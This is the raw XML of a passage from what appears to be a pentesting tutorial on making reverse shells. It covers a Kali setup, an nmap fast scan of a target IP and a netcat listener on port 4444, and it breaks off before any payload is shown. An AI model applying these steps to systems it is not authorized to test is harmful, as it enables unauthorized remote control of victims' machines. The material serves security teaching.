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15650" w14:textId="26A55B46" w:rsidR="00205213" w:rsidRPr="00C6168C" w:rsidRDefault="007C0F45">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00B0570A" w:rsidRPr="001A5270">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Making Reverse Shells</w:t>
      </w:r>
      <w:r w:rsidR="00B0570A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B0570A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00564591">
        <w:t>What is a shell? A shell is a way for a user to interface with a computer OS. Normally either a Graphic User Interface (GUI) or a Command Line Interface (CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24702F" w14:textId="74D9AB43" w:rsidR="00564591" w:rsidRDefault="00564591">
      <w:r>
        <w:t>What is a reverse shell? You (the attacker) don’t make a connection with the target (victim’s computer) with a shell. But the victim’s computer is tricked into making a connection with its shell to your computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E16A3" w14:textId="7121C2C1" w:rsidR="00564591" w:rsidRDefault="00564591">
      <w:r>
        <w:t>Think of it like secretly planting a phone in the target computer, and when you call, it answers, allowing you to control it remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D7404" w14:textId="30D673A9" w:rsidR="00EE793D" w:rsidRDefault="00EE793D">
      <w:r>
        <w:t xml:space="preserve">Pre-steps -make a directory called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the desktop directory on your Kali Machine, in that directory, make a file called “scope” and insert the IP of your target network. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.122.47 inside of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D7169" w14:textId="083F4CC2" w:rsidR="0018109B" w:rsidRDefault="0018109B">
      <w:r w:rsidRPr="0018109B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F705EF4" wp14:editId="5548F24C">
            <wp:extent cx="5442333" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17777439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43963" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5464973" cy="2180734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A9DA3" w14:textId="13B3CE09" w:rsidR="00EE793D" w:rsidRDefault="00EE793D">
      <w:r>
        <w:t>You can then nmap the network with this command: sudo nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scope -F | tee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fast_scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, which breaks down to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BD0015" w14:textId="04959A5F" w:rsidR="00EE793D" w:rsidRPr="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>nmap: Invokes the Nmap tool, which is a powerful network scanning and exploration tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8DE0C" w14:textId="08CEEADC" w:rsidR="00EE793D" w:rsidRPr="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE793D">
        <w:t>iL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE793D">
        <w:t xml:space="preserve"> {ip address}: Specifies a list of target IP addresses to scan. The {ip address} is a placeholder for the actual file or list of IP addresses. This option is used when you have a file containing a list of IP addresses that you want to scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B69F3" w14:textId="738EE253" w:rsidR="00EE793D" w:rsidRPr="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>-F: Performs a fast scan. It's a shorthand for a predefined set of options that are optimized for speed. It may not provide as much information as a more comprehensive scan, but it's quicker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C89F55B" w14:textId="45A32C75" w:rsidR="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t xml:space="preserve">| tee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE793D">
        <w:t>fast_scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE793D">
        <w:t xml:space="preserve">: The tee command is used to redirect the output of the nmap command to a file named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE793D">
        <w:t>fast_scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE793D">
        <w:t xml:space="preserve"> while still displaying it in the terminal. This allows you to both see the output on the screen and save it to a file for later reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881F08B" w14:textId="77777777" w:rsidR="0018109B" w:rsidRDefault="0018109B" w:rsidP="00564591">
      <w:r w:rsidRPr="0018109B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FDA587C" wp14:editId="06816CE2">
            <wp:extent cx="5668166" cy="800212"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2996742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74275" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5668166" cy="800212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="300463E7" w14:textId="0807A642" w:rsidR="00564591" w:rsidRPr="0018109B" w:rsidRDefault="00564591" w:rsidP="00564591">
      <w:r w:rsidRPr="00564591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process for Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F1433" w14:textId="1D31004C" w:rsidR="00564591" w:rsidRPr="00EF4D62" w:rsidRDefault="00564591" w:rsidP="00564591">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1    Listener (think: 'thing that catches reverse shell')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2456C42B" w14:textId="23006722" w:rsidR="00564591" w:rsidRPr="00EF4D62" w:rsidRDefault="00564591" w:rsidP="00564591">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2   Port Forwarding rule (think: 'thing that forwards reverse shell from router to kali')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B51C23" w14:textId="00D6925F" w:rsidR="00564591" w:rsidRPr="00EF4D62" w:rsidRDefault="00564591" w:rsidP="00564591">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3   Payload (think: 'thing that sends you a reverse shell')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53078F9A" w14:textId="161B81B3" w:rsidR="00564591" w:rsidRPr="00EF4D62" w:rsidRDefault="00564591">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1. </w:t>
      </w:r>
      <w:r w:rsidR="0002028E" w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NetCat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F06D9" w14:textId="5AAAD9C8" w:rsidR="00564591" w:rsidRDefault="000D62A5">
      <w:r>
        <w:t>You will use netcat, which is the main tool for reverse shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF1688" w14:textId="284BB25B" w:rsidR="000D62A5" w:rsidRDefault="000D62A5">
      <w:r>
        <w:t>The command: nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444 (doesn’t have to be 4444 any TCP/UDP port will do). The command breaks down to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3AD1D" w14:textId="77777777" w:rsidR="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>nc: Stands for netcat, which is a versatile networking tool for reading from and writing to network connections using TCP or UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B88CB8" w14:textId="1714A174" w:rsidR="0047632A" w:rsidRPr="00EE793D" w:rsidRDefault="0047632A" w:rsidP="00EE793D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r>
        <w:t>: Instructs netcat to not resolve hostnames (numeric-only addressing). This is useful to prevent DNS resolution delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534E65C" w14:textId="77777777" w:rsidR="00EE793D" w:rsidRPr="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>-l: Instructs netcat to operate in listening mode, waiting for incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976336F" w14:textId="77777777" w:rsidR="00EE793D" w:rsidRPr="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>-v: Enables verbose mode, providing more detailed output about the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B97E9A" w14:textId="63D5B2D7" w:rsidR="00EE793D" w:rsidRDefault="00EE793D" w:rsidP="00EE793D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE793D">
        <w:t>-p 4444: Specifies the port number 4444. This is the port on which netcat will listen for incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69E58B" w14:textId="134BBF00" w:rsidR="0018109B" w:rsidRPr="000D62A5" w:rsidRDefault="0018109B" w:rsidP="0018109B">
      <w:r w:rsidRPr="0018109B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BEB2A2E" wp14:editId="7A3E0A82">
            <wp:extent cx="3305175" cy="761305"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="213026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61432" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3346693" cy="770868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43965F" w14:textId="132ED104" w:rsidR="0002028E" w:rsidRDefault="0018109B" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000D62A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You would then use netstat -natp to view the open ports and make sure your port is listening.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000D62A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77269B6E" w14:textId="2A80D50B" w:rsidR="0047632A" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047632A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B79E376" wp14:editId="26086967">
            <wp:extent cx="5943600" cy="1221740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28882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24981" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1221740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="264344F1" w14:textId="77777777" w:rsidR="0047632A" w:rsidRPr="0047632A" w:rsidRDefault="0047632A" w:rsidP="0047632A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note that our shell is still our own…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F4E14" w14:textId="1CCFA742" w:rsidR="0047632A" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047632A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3461A629" wp14:editId="21303B6D">
            <wp:extent cx="4258269" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="9148358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35848" name="Picture 1" descr="A computer screen with text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4258269" cy="733527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EAF671" w14:textId="21DA06B0" w:rsidR="0002028E" w:rsidRPr="00EF4D62" w:rsidRDefault="0002028E" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Step  2. Nmap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681D46EC" w14:textId="502EE4D7" w:rsidR="00EE793D" w:rsidRDefault="00EE793D"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After this you’ll </w:t>
      </w:r>
      <w:r w:rsidR="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">want to refer to  your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidR="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>file that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
      <w:r w:rsidR="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ed the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> network to see what ports are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61858F76" w14:textId="7A86D2AD" w:rsidR="00EE793D" w:rsidRDefault="00EF4D62" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You did</w:t>
      </w:r>
      <w:r w:rsidR="00EE793D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not scan a router or switch, but a client’s services (or a host computer on the network) this is done by port forwarding on the routers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245A43C" w14:textId="10C1CD03" w:rsidR="0002028E" w:rsidRDefault="0002028E" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should see some ports open, i.e., 53 (DNS) and 80 (http), 80 being the best port to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CBFA1" w14:textId="77777777" w:rsidR="00EF4D62" w:rsidRDefault="00EF4D62" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B402A41" wp14:editId="33C4092C">
            <wp:extent cx="3962400" cy="1428327"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="84538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8401" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3970768" cy="1431343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CC89DC" w14:textId="4A9311C0" w:rsidR="0002028E" w:rsidRPr="00EF4D62" w:rsidRDefault="0002028E" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 3. Using the port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B751C20" w14:textId="17119DB4" w:rsidR="0002028E" w:rsidRDefault="0002028E"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If port 80 is open, which is http, you can interact with it via a web browser. So, if our target network is 192.168.122.47 then we’d </w:t>
      </w:r>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
